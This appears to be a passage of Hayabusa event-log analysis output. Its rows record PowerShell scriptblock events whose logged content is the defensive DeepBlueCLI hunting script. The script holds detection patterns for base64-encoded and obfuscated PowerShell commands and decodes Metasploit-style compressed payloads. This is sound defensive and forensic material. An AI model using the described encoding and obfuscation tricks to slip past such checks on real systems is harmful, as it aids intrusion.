#@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:59:31.974 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:59:31.974 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'""",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:59:31.974 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'""",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:59:31.974 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:59:31.974 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace "">"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars > characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:59:31.974 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace "">"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars > characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:59:31.977 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. 